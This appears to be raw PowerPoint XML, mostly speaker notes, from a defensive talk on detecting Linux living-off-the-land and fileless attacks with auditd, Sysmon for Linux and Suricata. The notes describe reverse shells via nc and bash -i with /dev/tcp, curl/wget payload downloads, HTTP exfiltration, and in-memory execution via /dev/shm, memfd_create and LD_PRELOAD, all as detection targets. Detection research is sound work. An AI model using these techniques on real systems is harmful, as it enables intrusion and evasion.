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6" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="280" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="283" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="284" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Anonymous Pro" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId22"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Horizon"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0677" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="51" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="153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05E72-3B4F-4DD0-8FDD-6EEBA864BBC1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/2025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5FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004681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5FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3260848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u="sng" dirty="0"/>
              <a:t>Reverse shell setup (e.g., nc, bash -i traffic)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/tskinnerarlo/Bridging-Host-and-Network/tree/main/Reverse_shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use auditd rules to log execve of suspicious programs and connect socket syscalls made by those programs, which is what actually establishes the reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Sysmon for Linux rules focused on reverse-shell setup via netcat (nc/ncat/netcat) and bash –I [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>explicitly starts a new interactive Bash shell session.]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (including /dev/tcp tricks). Also, using ProcessCreate to catch suspicious launches/parent-child chains and NetworkConnect to catch the actual outbound dial-out. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use suricata for Spotting reverse-shell commands moving in cleartext (typical of web-RCE payloads) and spot known banners/strings sent back by interactive shells (what the listener often sees after connect)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015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3851030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04A55-9503-50B2-B6D5-02A820204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92AFC-2E8D-ACF9-AEBC-A99A5B8B8A8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2499757-49D0-B7F3-8DA9-659785DE3AD1}"/>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941ADEC6-0AAB-CF50-681F-433D47D65F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340511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A675A-DAEF-4583-ECEE-E2A8BA987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81DD5B-AABA-F65A-EE40-155559225D1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945749B-ED57-A5FB-6556-807B88FFF4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/tskinnerarlo/Bridging-Host-and-Network/tree/main/Post_Exploit_JA3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: auditd/sysmon cannot see JA3 (it only records syscalls, not TLS handshakes), so you can’t match a JA3 hash with pure audit rules. But can still build a clean, repeatable detection by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>- Letting a network sensor (Suricata/Zeek) compute JA3 and flag watch-listed hashes,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>- Using Sysmon for Linux and or auditd to capture the host context (who/what made the connection), and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>- Correlating the two (in your SIEM or with a tiny helper) so your alert points at an exact process + user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E32B22-853D-BA9D-BF92-2048F8E9CF84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="783745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8A9F1-BE48-3E93-7472-B2EDFDE004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FA7DFF-9741-638E-089F-9076D7553CF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E0EF6B4-04DB-273B-10EF-A7800149FB79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/tskinnerarlo/Bridging-Host-and-Network/tree/main/Suspicious_File_Downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: curl / wget downloading “risky” file types from suspicious TLDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>write behavior from curl/wget to risky file types (e.g., .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .zip, .deb)</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2FBF181-BC91-1D20-3A28-9D9B3F5B3E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2570656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2B8DC-A459-E36D-1C19-4CC396856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252386-B208-BB55-1550-2D44638B7F0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3BF7897-3F51-2B15-83A6-33DDD93D954A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/tskinnerarlo/Bridging-Host-and-Network/tree/main/Exfil_via_http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: Why these work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exfil often uses methods that imply upload: PUT, PATCH, or WebDAV verbs (e.g., PROPPATCH, MKCOL) are unusual in most environments and commonly correlate with write operations to remote servers. Checking for a body (Content-Length) catches when data is being pushed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large POSTs are a classic signature of bulk data leaving the host (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dumps, archives). Header-based size checks are cheap and work regardless of TLS; you’re inspecting the request from the client → server side before encryption on some sensors or after decryption on proxies (depending on placement).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multipart with filename= is a strong indicator of a file upload via HTML forms or programmatic clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F87C110-B287-F323-3EFE-6695C716C163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264690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5FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1118866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5D023-C2D1-8CF3-5B7A-8D3E83CDA6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BBBCC-39C5-3ED3-9E73-202392F7249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1AE519B-F058-BCA6-9CE3-E163E1F3DFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In case can’t connect to lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD10139E-70CD-AF20-04FF-79864B461F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244202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One of the topics I was digging into was how attackers often “live off the land” by using tools built into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> operating system to accomplish their goals. Attacks using these tools are tough to detect due to their legitimate uses and the host based detections that do get deployed to address these methods, are often wrought with false positives. So, I got to thinking, could using Suricata to monitor the related network activity to these detections help us reduce the false positives, and give us more high fidelity detections for these living off the land attacks? And that question is where this whole effort started.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1246070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highlight the problem, there has been a rise in Fileless Linux Attacks, these fileless attacks are increasingly common on Linux because attackers don’t need to write binaries to disk—everything runs in memory or via native system components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216216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Linux historically has less security tool coverage than Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So attackers target Linux to avoid detection, not because Windows is harder.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4098061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Crypto-miners (malware) are launched via /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or /proc/self/mem to achieve defense evasion by executing without storing the payload on the physical disk. For those not familiar with execution from /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a shared memory space (a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mount) that is writable by default and typically has execution permissions. Adversaries can download or write malicious scripts and binaries into this memory space and execute them directly. Since the data resides in RAM, it often disappears upon a system reboot. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution via /proc/self/mem: involves the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Linux system call. This call creates an anonymous file descriptor in memory (/proc/PID/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ entries) that can be used to inject and execute code. This method is even stealthier than using /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> because no temporary file storage is visible in the filesystem,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LD_PRELOAD is an environment variable used by the dynamic linker (ld.so or ld-linux.so) to specify a shared library objects to be loaded into a process's address space before any other standard libraries. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These shared libraries can load malicious code into legitimate processes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>or hide files or network connections by overriding open() or read() functions), creating backdoors, or logging credentials.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74632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we see the native bash shell being used to create a reverse shell, again, the primary challenge is that a lot of these methods can look like regular sysadmin usage if we are not properly instrumenting our networks to provide the telemetry we need for detection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334713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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Why this matters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scenario			What you miss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fileless malware runs in memory	No files, no network IOCs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious admin activity (insider threat)	No signatures, no C2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local privilege escalation		Only detectable with kernel/audit instrumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3477707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5FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1173808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D638D-18B4-C14F-3600-C05311C7A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1FBDA2-FC9B-8941-5614-1C33EF3FC0A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92DAA15-436A-F098-34D7-C9FBD1101FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
